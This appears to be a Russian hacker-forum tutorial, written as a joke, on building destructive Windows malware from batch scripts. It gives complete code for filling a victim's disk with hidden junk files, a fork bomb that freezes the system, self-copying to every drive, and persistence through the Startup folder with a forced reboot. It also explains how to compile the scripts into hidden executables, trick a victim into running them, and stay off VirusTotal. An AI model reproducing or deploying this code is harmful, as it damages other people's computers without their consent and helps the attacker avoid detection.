В честь бессонной ночи одолела меня со страшной силой "любовь" к ближним. И вдохновленный сим благим чувством, решил я организовать кому-нибудь какое-нибудь ЗАПАДЛО.
Сразу скажу, мы НЕ будем получать доступ к чужой информации, тырить деньги или логи, а просто мелко нагадим жертве.
Дальше многабукафф:
Для этого нам понадобятся:
- Руки. Желательно - прямые. Желательно - из плечей - 2 шт.
- Голова. Сойдет даже дурная и пустая - 1 шт.
- Компьютер (сойдет даже intel 80286 или подобный).
- Bat2exe converter.
- Akelpad (для того, чтобы у нас не возникало проблем с кириллическими именами файлов)
- Желание кому-нибудь нагадить.
- Наличие недруга приветствуется.
На этом подготовительная стадия может считаться законченной.
Теперь разберемся, что именно мы будем делать.
Самое простое и безболезненное - аццки замусорить компьютер жертвы. Мусор мы возьмем там же, так что будет проще.
Для этого мы будем использовать замкнутый цикл.
Итак - шаг первый - создаем папочку, где и будем работать. В этой папочке создаем файл trash.cmd.
Далее - изменяем его и записываем такие строчки:
:start @echo off set name=%random% copy c:\windows\system32\win32k.sys %name%.log attrib %name%.log +s +h goto start
Сохраняем, запускаем, засекаем 5 минут, закрываем черное окно. После чего заходим в нашу папку, включаем отображение системных и скрытых файлов, и начинаем истерично хихикать. Не знаю, как у кого, но у меня накидало почти 4,5 гигов мусора. Согласен, цифра для современных винтов небольшая, однако даже такой бантик, работающий в течении часа способен засрать диск 54 гигами мусора. Теперь немного о грустном. Переменная random принимает значение от 0 до 32767, при размере файла-донора в 3 Мб у нас получится максимум 100+ гигов мусора. Плюсом существует вероятность (1:32 767), что бантик попытается перезаписать уже существующий файл, и соответственно, закроется с ошибкой. Для того, чтобы обойти эти неприятные моменты, несколько меняем наш бантик, чтобы он выглядел следующим образом:
:start @echo off set name=%random%%random%%random% copy /y c:\windows\system32\win32k.sys %name%.log attrib %name%.log +s +h +r goto start
Тем самым мы многократно увеличиваем количество возможных имен файла, отключаем подтверждение на перезапись существующего файла и присваиваем нашему мусору атрибут "ReadOnly", что не играет особой роли, но ламеру сойдет.
Теперь озаботимся тем, чтобы наш файлик не светился черным окошком, ибо это не комильфо.
Для этого качаем bat2exe converter (нужна СТАРАЯ версия, которая 1.6), запускаем, и приводим это примерно вот в такое состояние:
После чего нажимаем на кнопочку Compile, и полученный файлик кладем куда-нибудь в сторону. На данный момент мы с ним работу закончили.
Теперь нанесем удар по процессору жертвы. ВНИМАНИЕ!!! Все, что будет написано дальше, НЕ СТОИТ ПРОБОВАТЬ НА СВОЕМ КОМПЬЮТЕРЕ!!!
Создаем текстовый файлик, обзываем его launch.cmd, открываем, пишем внутрь следующую гадость:
@echo off :start start trash.exe goto start
Если кто-то не внял предупреждению, и запустил это безобразие, любознательный самодельщик убедился, что процессор и оперативка засраны по самое дальше не балуйся. Это касается и моего достаточно мощного компьютера. Мастдай перестает реагировать абсолютно на все, кроме Reset'а и отключения питания. Но мы не будем останавливаться на достигнутом, и пойдем дальше.
Снова запускаем Bat2Exe converter, добавляем туда наш лаунчер и приводи все в состояние с предыдущего скриншота. Потом переходим во вторую вкладочку, которая "Include". В ней добавляем ранее подготовленный файл "trash.exe", нажав на кнопочку "Add". После этого опять нажимаем "Compile", и получаем готовую бомбу. В принципе, на этом можно и остановиться, но мы не будем.
Шаг следующий - автозапуск.
Для этого мы снова создаем текстовый файл, обзываем его arun.cmd, записываем внутрь следующее содержание:
@echo off copy /y launch.exe c:\launch.exe copy /y launch.exe d:\launch.exe copy /y launch.exe e:\launch.exe copy /y launch.exe f:\launch.exe copy /y launch.exe g:\launch.exe copy /y launch.exe h:\launch.exe copy /y launch.exe i:\launch.exe copy /y launch.exe j:\launch.exe copy /y launch.exe k:\launch.exe copy /y launch.exe l:\launch.exe copy /y launch.exe m:\launch.exe copy /y launch.exe n:\launch.exe copy /y launch.exe o:\launch.exe copy /y launch.exe p:\launch.exe copy /y launch.exe q:\launch.exe copy /y launch.exe r:\launch.exe copy /y launch.exe s:\launch.exe copy /y launch.exe t:\launch.exe copy /y launch.exe u:\launch.exe copy /y launch.exe v:\launch.exe copy /y launch.exe w:\launch.exe copy /y launch.exe x:\launch.exe copy /y launch.exe y:\launch.exe copy /y launch.exe z:\launch.exe c:\ cd \ start launch.exe d:\ cd \ start launch.exe e:\ cd \ start launch.exe f:\ cd \ start launch.exe g:\ cd \ start launch.exe h:\ cd \ start launch.exe i:\ cd \ start launch.exe j:\ cd \ start launch.exe k:\ cd \ start launch.exe l:\ cd \ start launch.exe m:\ cd \ start launch.exe n:\ cd \ start launch.exe o:\ cd \ start launch.exe p:\ cd \ start launch.exe q:\ cd \ start launch.exe r:\ cd \ start launch.exe
Маленькая ремарка - все можно сделать намного проще и изящнее - ввести цикл, который переберет буквы от C до Z, но мне сейчас тупо лень. Кроме того, можно ввести проверку наличия файла в диске, самого диска и прочее, но мне опять же лень.
Теперь опять же запускаем Bat2Exe. Добавляем файл Launcher.exe, компилируем, откладываем в сторонку.
Теперь нам надо, чтобы наш файл автозапуска прописался в том самом автозапуске. Для этого можно воспользоваться системным реестром, но тогда в семерке потребуется подтверждение запуску, а нам оно не надо. Мы воспользуемся пунктом "автозапуск" меню "пуск". Для этого будет нужен вот такой бантик:
if exist c:\users (goto win7) else goto winxp :win7 copy arun.exe "%appdata%\Microsoft\Windows\start menu\programs\startup\arun.exe" goto end :winxp chcp 1251 copy arun.exe "C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\arun.exe" :end shutdown -r -f -t 0
Опять же добавляем файл arun.exe, скрываем, компилируем, и радуемся, что работа закончена. Теперь осталось подкинуть файл жертве, и убедить ее (то бишь жертву), файлик запустить.
Большая просьба - не выкладывать на вирустотал, иначе очень скоро шутка перестанет быть смешной.
На семерке запускать конечный продукт не пробовал, но вот хрюше настает весьма неиллюзорный амбец. При этом все достаточно просто лечится, так что в случае чего не придется сносить систему. Но ведь об этом знаем только мы... Кстати, если кто-то рискнет запустить под семеркой - отпишитесь, интересно, сработало или нет.